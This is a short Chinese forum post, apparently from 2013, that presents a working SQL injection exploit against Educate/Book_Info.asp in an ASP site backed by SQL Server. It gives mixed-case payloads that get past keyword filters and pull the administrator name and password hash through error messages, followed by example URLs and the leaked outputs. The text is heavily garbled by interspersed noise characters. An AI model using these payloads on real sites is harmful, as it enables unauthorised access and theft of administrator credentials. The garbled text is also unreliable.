漏洞出现在Educate/Book_Info.asp - a! e! z9 R0 K: P8 T$ y. V
8 F7 |, |3 Y4 C9 w5 F% J此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出" O4 i4 [& ]5 z0 |# ?2 ~0 Q! U
/ ~0 I; [0 O2 N& O6 R0 V
exp:如下
9 _8 r* s# a, |查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
5 y9 z4 |& C$ N& k) g查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
4 V" V. U# ~) A8 R4 [) r
9 \8 o7 M- j" Q3 J, \. x* y* U! hhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
7 a. e2 @, M1 a7 ?1 Y5 q
) Z3 m) T' h& Z3 {& h# t9 lMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
9 b) S( \- N$ ^7 w
& [$ L2 L6 c4 W) D% D! B将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。* t4 a) c# c6 f1 F% U
, B7 o: s7 y: ~! P0 K/Educate/Book_Info.asp,行 89 Z6 X) \* R9 D1 {* \! b
( M" Q, Z! q$ R; j& M4 d rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)* G5 K z0 i: `& k8 p G
: `4 C/ s4 M( x: W$ F8 N9 s0 F" d
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
5 d6 C7 t+ G1 Y; n
! }# a- R8 Y5 a! y/ w2 i, J/ `将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。) F7 Q& y: D! D5 M& c d0 G7 K
' Z5 N/ t& K0 s8 _( x2 A+ l/Educate/Book_Info.asp,行 83 }4 v# n! ]& G* V
|
发表于 2013-2-16 21:44:16
收藏
支持
反对